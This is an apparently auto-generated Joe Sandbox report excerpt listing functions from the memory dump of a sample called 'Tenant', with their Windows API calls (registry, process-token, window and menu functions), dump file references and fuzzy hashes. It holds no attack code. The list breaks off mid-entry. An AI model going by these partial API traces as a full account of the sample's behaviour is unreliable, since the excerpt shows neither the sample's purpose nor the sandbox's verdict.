                                                                                        Function 00AC41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AC4282,?), ref: 00AC41D3
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AC41DA
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00AC41E6
                                                                                        • DecodePointer.KERNEL32(00000001,00AC4282,?), ref: 00AC4203
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 3489934621-340411864
                                                                                        • Opcode ID: 4f6b636428d73d1c783cc155f1ad97f862d86721d848c41ce410ddd3e71dd5fc
                                                                                        • Instruction ID: 1233dcd7bc3c1cc5bef9455b49de3e453928714e1efe4b82715ac39a69d22154
                                                                                        • Opcode Fuzzy Hash: 4f6b636428d73d1c783cc155f1ad97f862d86721d848c41ce410ddd3e71dd5fc
                                                                                        • Instruction Fuzzy Hash: 1FE0E5B46A1701AFEB202B70EC5DB093AA4AB1AB06F704668F441E70F0CFF941948F04
                                                                                        Function 00AC428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC41A8), ref: 00AC42A8
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AC42AF
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00AC42BA
                                                                                        • DecodePointer.KERNEL32(00AC41A8), ref: 00AC42D5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: 27c11bc42f47f9dd2d60dc57246d82bc426a3725aa816820e8a41c7bd0ba45c7
                                                                                        • Instruction ID: 40a0a3f60ad4700695cd05b6846b7823b3b19190fae545ef7c3cb2cd8defeafb
                                                                                        • Opcode Fuzzy Hash: 27c11bc42f47f9dd2d60dc57246d82bc426a3725aa816820e8a41c7bd0ba45c7
                                                                                        • Instruction Fuzzy Hash: E1E0B670560B00ABEB20AF60AD1DB493AA4BB09B02F600168F041E74F0CFF84594CB14
                                                                                        Function 00AA218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00AA21B8
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA21F9
                                                                                        • ScreenToClient.USER32(?,?), ref: 00AA2221
                                                                                        • GetClientRect.USER32(?,?), ref: 00AA2350
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA2369
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 73cd1d92c7d32771e85d307e06edb3bb8dc1891cea4b6d8f0901389862ab4491
                                                                                        • Instruction ID: 14f27c08b79d43a0f17197b3438489bb1e07fb17f6e48e5f9f0417cf17f9ea21
                                                                                        • Opcode Fuzzy Hash: 73cd1d92c7d32771e85d307e06edb3bb8dc1891cea4b6d8f0901389862ab4491
                                                                                        • Instruction Fuzzy Hash: 59B15C39910249DBDF10CFA8C9807EDB7B1FF49710F14812AED59AB294DB34AA60DB64
                                                                                        Function 00B06A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                        • Instruction ID: 0436842b0d571bf6efecfd3c22fe175293ba0b1856d284570d03e463fe3ebdd7
                                                                                        • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                        • Instruction Fuzzy Hash: 3861BC3060029AABDF11EF60CD92EFE3BA8EF4A308F454599F8556B1D2DB30AD55CB50
                                                                                        Function 00B20844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2091D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2095D
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B20980
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B209A9
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B209EC
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B209F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: 8e6f0e92b50e6d8fc494b03be80c93b199a1e786450c72924b6f4fcae474d997
                                                                                        • Instruction ID: 1c4fb13a75428c3f90679120678eac26894bec4926856fef31766c64432792d1
                                                                                        • Opcode Fuzzy Hash: 8e6f0e92b50e6d8fc494b03be80c93b199a1e786450c72924b6f4fcae474d997
                                                                                        • Instruction Fuzzy Hash: 6F517931218204AFD704EF68C995E6EBBE8FF85314F04495DF58A872A2DB31E945CB52
                                                                                        Function 00B25DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00B25E38
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00B25E6F
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B25E97
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00B25F06
                                                                                        • GetSubMenu.USER32(?,?), ref: 00B25F14
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25F65
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 630b282c6db96b1ebda8fe408418e609696853e6953d377b4e689fbdf07cc0f1
                                                                                        • Instruction ID: e09ec9e3d8921107bf8edf4a0e94e10e7c01bbe0a98580d52bab5b208fbb6a45
                                                                                        • Opcode Fuzzy Hash: 630b282c6db96b1ebda8fe408418e609696853e6953d377b4e689fbdf07cc0f1
                                                                                        • Instruction Fuzzy Hash: 4751A035A00625AFCF21EF64D945AAEB7F5EF48310F114099F915BB391CB70AE418B91
                                                                                        Function 00AFF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00AFF6A2
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00AFF714
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00AFF76F
                                                                                        • _memmove.LIBCMT ref: 00AFF799
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AFF7E6
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF814
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
                                                                                        • Opcode ID: ad228e1e60e6b59f631de0a08141b1d286b83a053e4103cb51bde508f77ed72a
                                                                                        • Instruction ID: 969474e81ebffbda06e10011eb3e62fd1ed29c38d598ea25f3a37476f7d5edc7
                                                                                        • Opcode Fuzzy Hash: ad228e1e60e6b59f631de0a08141b1d286b83a053e4103cb51bde508f77ed72a
                                                                                        • Instruction Fuzzy Hash: 77514AB5A00209EFCB14DF58C894AAAB7B8FF4C354B15856AFA59DB304D730E911CFA0
                                                                                        Function 00B029B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B029FF
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02A4A
                                                                                        • IsMenu.USER32(00000000), ref: 00B02A6A
                                                                                        • CreatePopupMenu.USER32 ref: 00B02A9E
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00B02AFC
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02B2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: e99cb547bf2754d57ca94385eaf86dd2387faa231d2bcbaa85af6406c3442929
                                                                                        • Instruction ID: 358acfcd25e27b55cd84c18e66294a95bf129fdd0a7a6f31ec6f9392b266f749
                                                                                        • Opcode Fuzzy Hash: e99cb547bf2754d57ca94385eaf86dd2387faa231d2bcbaa85af6406c3442929
                                                                                        • Instruction Fuzzy Hash: 18518A70A0024AEBDF25DF68D88CBAEBFF4EF54314F104199E8159B2E1EB709949CB51
                                                                                        Function 00AA1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA1B76
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AA1BDA
                                                                                        • ScreenToClient.USER32(?,?), ref: 00AA1BF7
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA1C08
                                                                                        • EndPaint.USER32(?,?), ref: 00AA1C52
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: acd8f3a2af6a3a36646cb19e48235ef684a37d70be949b48b4b07f26268ac60c
                                                                                        • Instruction ID: 73a2bf8acd87a1d84f70c416810eed869c2c28260e588171cdffa54873457783
                                                                                        • Opcode Fuzzy Hash: acd8f3a2af6a3a36646cb19e48235ef684a37d70be949b48b4b07f26268ac60c
                                                                                        • Instruction Fuzzy Hash: 7141AC30244200AFD710EF25CC99FAA7BF8EF4A764F140669F9A5872E2CB719C45DB61
                                                                                        Function 00B2BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00B677B0,00000000,01125678,?,?,00B677B0,?,00B2BC1A,?,?), ref: 00B2BD84
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B2BDA8
                                                                                        • ShowWindow.USER32(00B677B0,00000000,01125678,?,?,00B677B0,?,00B2BC1A,?,?), ref: 00B2BE08
                                                                                        • ShowWindow.USER32(00000000,00000004,?,00B2BC1A,?,?), ref: 00B2BE1A
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00B2BE3E
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2BE61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 8d1cdb20b5f22282fe47f63b812c153baa84e777674adcfe39b63e7166fd5784
                                                                                        • Instruction ID: 6d50e52ca649a64ac864a09e3f7fb682f397584dbaa736698fbff8cc9dd448f4
                                                                                        • Opcode Fuzzy Hash: 8d1cdb20b5f22282fe47f63b812c153baa84e777674adcfe39b63e7166fd5784
                                                                                        • Instruction Fuzzy Hash: EA411534600164AFDB26DF28D49AFD47BE1EF05314F2981F9EA4C8F2A2CB31A845CB51
                                                                                        Function 00B17788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00B1550C,?,?,00000000,00000001), ref: 00B17796
                                                                                          • Part of subcall function 00B1406C: GetWindowRect.USER32(?,?), ref: 00B1407F
                                                                                        • GetDesktopWindow.USER32 ref: 00B177C0
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B177C7
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B177F9
                                                                                          • Part of subcall function 00B057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05877
                                                                                        • GetCursorPos.USER32(?), ref: 00B17825
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B17883
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 59fa385b5dc6de46a5548e3fab63bd91e69018665a9ef3edbdc6b996e739520b
                                                                                        • Instruction ID: 1aaf95da435e4298e0e129fc0ec63aa915bd692be2b55f5c4e9ff9606d52152c
                                                                                        • Opcode Fuzzy Hash: 59fa385b5dc6de46a5548e3fab63bd91e69018665a9ef3edbdc6b996e739520b
                                                                                        • Instruction Fuzzy Hash: E331AC72508305ABD720EF158849E9FBBEAFF88314F100959F589A7191CA30E948CBA2
                                                                                        Function 00AF9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8CDE
                                                                                          • Part of subcall function 00AF8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8CE8
                                                                                          • Part of subcall function 00AF8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8CF7
                                                                                          • Part of subcall function 00AF8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8CFE
                                                                                          • Part of subcall function 00AF8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF8D14
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00AF904D), ref: 00AF9482
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF948E
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF9495
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF94AE
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00AF904D), ref: 00AF94C2
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF94C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: 5c54aad9c83b82f393eae0200248b2e9071f032dace2d437ea5b3b6003913d2e
                                                                                        • Instruction ID: 8d21e999ac56b68228615e4803c0ddec3d035ead578c9f9499773d28624f0fa0
                                                                                        • Opcode Fuzzy Hash: 5c54aad9c83b82f393eae0200248b2e9071f032dace2d437ea5b3b6003913d2e
                                                                                        • Instruction Fuzzy Hash: A311B131511608FFDB149FA4CC19BBF7BA9FF55316F208018FA85A7210CB399901DB60
                                                                                        Function 00AF91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF9200
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AF9207
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF9216
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00AF9221
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF9250
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF9264
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 254839e1f495eb8d458fe1821ef5db51658e4bce75e0995fb9a0c87a30a9ef7b
                                                                                        • Instruction ID: 4989ca64376b8e4c1ad5486fffce8674f07d5083fcd4f0d192c69af50d6369e7
                                                                                        • Opcode Fuzzy Hash: 254839e1f495eb8d458fe1821ef5db51658e4bce75e0995fb9a0c87a30a9ef7b
                                                                                        • Instruction Fuzzy Hash: C911567250120EABDF019FE4ED89FEE7BA9EF08304F144164FE04A2160C7729E64EB60
                                                                                        Function 00AFC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00AFC34E
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AFC35F
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AFC366
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00AFC36E
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AFC385
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00AFC397
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
